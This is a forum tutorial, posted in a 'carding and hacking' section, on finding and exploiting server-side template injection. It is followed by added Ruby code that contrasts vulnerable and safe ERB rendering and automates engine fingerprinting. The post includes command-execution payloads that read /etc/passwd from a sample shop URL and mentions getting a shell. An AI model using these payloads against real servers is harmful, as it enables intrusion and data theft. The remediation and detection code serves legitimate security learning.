CARDING & HACKING
Hacking Tools
How to Hack a Server Using SSTI?
Plotu (post 382) wrote:

[Image: https://sun9-67.userapi.com/impg/c857024/v857024699/17a1d1/_teHGy7WBcw.jpg?size=807x485&quality=96&sign=70e505262a114214d6095a48f00fffaf&type=album]

Today I will tell you what Server-side template injection (SSTI) is in practice. I'll show you how to find this vulnerability and escalate it to code execution on the server. You will also find out why bug bounty payouts for this vulnerability go up to $10,000. It might seem like the vulnerability is difficult to exploit, but it is not. There are many details, but in general it is quite easy to find and escalate. Well, shall we get going? Let's look at another interesting vulnerability.

What is server-side template injection?

For example, when you change your password, a notification like "Username, your password has been changed." is sent to your mailbox. This is a template: the same message goes to every user, only the username parameter differs. If an attacker can pass a payload written in the template engine's syntax and the server evaluates it as part of the template, the application is vulnerable to SSTI.

The risk and consequences depend directly on the functionality of the engine. Sometimes SSTI allows you to execute arbitrary code on the server and gain full control of it. Even if the engine has restrictions (a sandbox) and code execution is not possible, other attacks can be carried out through SSTI that lead to leakage of confidential information. Let's take a specific example: an online store has a feature that sends the customer a copy of the order contents. Something like this:

The template substitutes the <username> and <order_sum> parameters with the specific user and the order amount, respectively. What happens if you register a user with the nickname 5*5 or {{5*5}}? If the template is assembled incorrectly, the next order confirmation will show the following:

That is, the expression placed in the <username> parameter was evaluated on the server side via SSTI. Using a more specific example, I will show how to escalate this vulnerability to arbitrary code execution.

How do I find SSTI?

Find a place where your input is returned in the response: a web form, an order page, a profile, and so on. Then try adding different SSTI payloads and look either for an error or for the expression being evaluated. If you get a response like the one below, the SSTI is confirmed:
Code:
User = Hello ${7*7}
Hello 49

Errors are thrown when the expression is not well formed, and they can also hint at SSTI. Something like this can be obtained from the Ruby ERB engine:
Code:
(erb):1:in `<main>': undefined local variable or method `foobar' for main:Object (NameError)
	from /usr/lib/ruby/2.5.0/erb.rb:876:in `eval'
	from /usr/lib/ruby/2.5.0/erb.rb:876:in `result'
	from -e:4:in `<main>'

Next, you need to determine which engine is in use: FreeMarker, Velocity, Smarty, Twig, Twig (sandboxed), Jade and others. There is a hint chart that lets you identify the engine from the results of evaluating a few probes. Here are the most popular options; if you get other errors, Google is your friend.

[Image: Defining the engine template, https://sun9-30.userapi.com/impg/c857528/v857528699/22d0c9/sbtnBi-vNIQ.jpg?size=768x463&quality=96&sign=a0e4aed60263656a32acdf6732a50dea&type=album]

Exploiting a real SSTI

Let's exploit SSTI in practice. Imagine an online store where one of the pages is requested with this URL:
Code:
https://internetshop.com/?message=Object is not found

Then we try to pass our own value in the parameter and check that it is displayed on the page:
Code:
https://internetshop.com/?message=SSTI

The string SSTI appears on the page. Great, we potentially have an SSTI. Now we need to figure out which template engine it is and get code execution on the server. Next, we load the whole list of candidate payloads and analyze the responses. This can be automated with Burp Suite Intruder. You can see my list of payloads in the screenshot; the link has a more detailed list for all engines.

[Image: https://sun9-2.userapi.com/impg/c857436/v857436699/22c1b9/tIy_qW7w9pM.jpg?size=807x286&quality=96&sign=51eb750c40ed5b76132635acdb2a5fa8&type=album]

We see that the payload <%= 7*7 %> worked and the page displays the evaluated result 49. To double-check, insert the payload into the request by hand and look at the page. The payload itself must be URL-encoded (note that the % characters of the ERB tags become %25, otherwise the server rejects the query string):
Code:
https://internetshop.com/?message=%3c%25%3d%207%2a7%20%25%3e

Next we find that the <%= 7*7 %> syntax belongs to the ERB engine. Now we look for a payload that executes system commands:
Code:
<%= system("cat /etc/passwd") %>
https://internetshop.com/?message=<%= system("cat /etc/passwd") %>

After URL-encoding, the final payload looks like this:
Code:
https://internetshop.com/?message=%3c%25%3d%20%73%79%73%74%65%6d%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%20%25%3e

A caveat: Ruby's system returns true or false and writes the command's output to the server process's stdout, not into the rendered page. If you only see "true" in the response, use backticks instead, for example <%= `cat /etc/passwd` %>, which return the command output as a string.

[Image: Contents of the /etc/passwd file, https://sun9-6.userapi.com/impg/c857436/v857436699/22c1cb/x2a-gcxzpWA.jpg?size=769x522&quality=96&sign=71e635079cab582027d4013303e67caf&type=album]

We got server-side code execution through SSTI. The screenshot above shows the contents of the /etc/passwd file. From here you can get a shell or read other files; it all depends on the goals and objectives.

How much do bug bounty programs pay for SSTI?

SSTI is less common in bug bounty reports. The reward ranges from $1,000 to $10,000. The maximum payouts are for Server-side template injection that results in remote code execution. Let's analyze two such examples.

The first example was found in Uber's bug bounty program. A user with the nickname Orange changed his nickname on the uber.com website to {{'7'*7}} and received "7777777" in an email (the string '7' repeated seven times). That indicates the system is vulnerable to SSTI (a Jinja2 template). The hacker received a $10,000 reward for this vulnerability.

[Image: https://sun9-86.userapi.com/impg/c857528/v857528699/22d0db/iorTZbtwlWQ.jpg?size=807x457&quality=96&sign=05d6376a5d9d335676d27d79e131523e&type=album]

[Image: https://sun9-81.userapi.com/impg/c857528/v857528699/22d0e4/QP9qe0nbOdA.jpg?size=807x203&quality=96&sign=368b79037da15c76f90f0bba8838bfd3&type=album]
BugBounty Uber Program

The second example was found in Shopify's program. Exploitation is much harder than in the first example. The user tampered with a standard mail template, managed to get the modified template rendered and extracted additional information. This find also brought the hacker $10,000.

[Image: https://sun9-45.userapi.com/impg/c857528/v857528699/22d0ed/05VwULAdusc.jpg?size=807x303&quality=96&sign=91bf945d0fc0d77712744c72ff06ee20&type=album]
BugBounty Shopify program

Conclusion

Server-side template injection is a serious vulnerability. Through SSTI you can gain full control over the server, which we discussed today with specific examples. Template engines will keep gaining traction, so we can expect even more such reports on bug bounty platforms.
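As an added example (not code from Plotu's post), here is the order-confirmation mistake described above written out in Ruby's ERB, with the vulnerable renderer beside the hardened one. The template text, the nickname and the order amount are constructed for the demo; the point is that the vulnerable version splices the nickname into the template source, so an ERB tag inside it is compiled and run, while the safe version keeps the template fixed and passes the nickname in as data.

```ruby
require 'erb'

# VULNERABLE: the nickname becomes part of the template *source*. Any ERB tag
# in it (e.g. "<%= 5*5 %>") is compiled and executed on the server.
def render_order_vulnerable(username, order_sum)
  template = "Hello #{username}, your order for #{order_sum} is confirmed."
  ERB.new(template).result(binding)
end

# SAFE: the template is a constant; user input is substituted at render time
# as a plain value and is never parsed as template syntax.
# (For HTML output you would additionally pass it through ERB::Util.html_escape
# to stop XSS, which is a separate issue from SSTI.)
def render_order_safe(username, order_sum)
  template = 'Hello <%= username %>, your order for <%= order_sum %> is confirmed.'
  ERB.new(template).result_with_hash(username: username, order_sum: order_sum)
end

if __FILE__ == $0
  nickname = '<%= 5*5 %>'   # constructed attacker-chosen nickname
  puts render_order_vulnerable(nickname, 100)  # Hello 25, your order for 100 is confirmed.
  puts render_order_safe(nickname, 100)        # Hello <%= 5*5 %>, your order for 100 is confirmed.
end
```

The same split applies to any engine: the bug is never the engine itself but building the template string from user-controlled data before handing it to the engine.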
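The "How do I find SSTI?" step above boils down to a small decision procedure: send a few arithmetic probes, see which one gets evaluated and what it evaluates to. This added example (mine, not from the post) implements that procedure as a fingerprinter in Ruby. The probes and their expected results are the standard ones for each engine, and the two pages it is run against are constructed stand-ins for the shop page, one vulnerable and one safe; against a real target, `render` would be a lambda that performs the HTTP request and returns the body.

```ruby
require 'erb'

# [payload, { expected_output => engine }]. The payloads are written in single
# quotes where needed so Ruby itself does not interpolate the #{...} probe.
PROBES = [
  ["{{7*'7'}}",  { '7777777' => 'Jinja2 (Python)', '49' => 'Twig (PHP)' }],
  ['${7*7}',     { '49' => 'FreeMarker / Mako family' }],
  ['<%= 7*7 %>', { '49' => 'ERB (Ruby)' }],
  ['#{7*7}',     { '49' => 'Pug/Jade (Node)' }],
]

# Probes the target with each payload in turn and returns:
#   [engine, payload]  for the first probe that is evaluated,
#   [:error, payload]  if a probe makes the page throw (like the ERB NameError
#                      quoted in the post, itself a strong SSTI hint), or
#   nil                if every probe is reflected verbatim (nothing evaluated).
# Note: "49" can occur in a page by coincidence; on a real target use a product
# that cannot already be on the page, e.g. 1337*1337, and compare the same way.
def fingerprint(render)
  PROBES.each do |payload, outcomes|
    begin
      body = render.call(payload)
    rescue StandardError, SyntaxError
      return [:error, payload]
    end
    next if body.include?(payload)            # reflected as-is: not evaluated
    outcomes.each do |expected, engine|
      return [engine, payload] if body.include?(expected)
    end
  end
  nil
end

# Constructed vulnerable page: the query value is spliced into the template
# source, so ERB compiles whatever the user sent.
VULNERABLE_PAGE = ->(message) { ERB.new("<h1>Shop</h1><p>#{message}</p>").result }

# Constructed safe page: the same value passed as data to a fixed template.
SAFE_PAGE = lambda do |message|
  ERB.new('<h1>Shop</h1><p><%= message %></p>').result_with_hash(message: message)
end

if __FILE__ == $0
  p fingerprint(VULNERABLE_PAGE)   # ["ERB (Ruby)", "<%= 7*7 %>"]
  p fingerprint(SAFE_PAGE)         # nil
end
```

The order of the probes matters: `{{7*'7'}}` goes first because it separates Jinja2 from Twig in one request, and the ERB probe is harmless on engines that do not use `<% %>` because they simply reflect it.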
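Two practical checks for the exploitation step, as an added example in Ruby (not from the post): first, encoding and decoding the payload correctly for a query parameter, since a bare `%` in the URL is a malformed payload rather than an ERB tag; second, why `system` does not put the command's output into the page while backticks do. The vulnerable renderer is a constructed stand-in for the shop page, and the command used for the demo is a harmless `echo` rather than `cat /etc/passwd`.

```ruby
require 'erb'
require 'uri'

# Percent-encode a payload for a query string. ERB::Util.url_encode encodes
# every byte outside [A-Za-z0-9_.~-], so '%' becomes %25 and ' ' becomes %20.
def encode_payload(payload)
  ERB::Util.url_encode(payload)
end

# Decode a query value back to the raw payload. Raises ArgumentError when a
# '%' is not followed by two hex digits, e.g. "%%3d" where "%25%3d" was meant.
def decode_payload(encoded)
  URI.decode_www_form_component(encoded)
end

# Constructed vulnerable renderer: the parameter is spliced into the template.
def render_vulnerable(message)
  ERB.new("<p>#{message}</p>").result
end

# Kernel#system returns true/false and sends the command's stdout to the
# server process, so the rendered page only shows "true".
def system_payload_result(cmd)
  render_vulnerable("<%= system(#{cmd.inspect}) %>")
end

# Backticks return the command's stdout as a String, so it lands in the page.
def backtick_payload_result(cmd)
  render_vulnerable("<%= `#{cmd}` %>")
end

if __FILE__ == $0
  puts encode_payload('<%= 7*7 %>')                    # %3C%25%3D%207%2A7%20%25%3E
  puts decode_payload('%3c%25%3d%207%2a7%20%25%3e')    # <%= 7*7 %>
  puts system_payload_result('echo ssti-check')        # <p>true</p>
  puts backtick_payload_result('echo ssti-check')      # <p>ssti-check\n</p>
end
```

`URI.decode_www_form_component` is also what you want for verifying a long hand-assembled URL before sending it: if it raises, the server would have rejected or mangled the request anyway, and a silent "nothing happened" would have been misread as "not vulnerable".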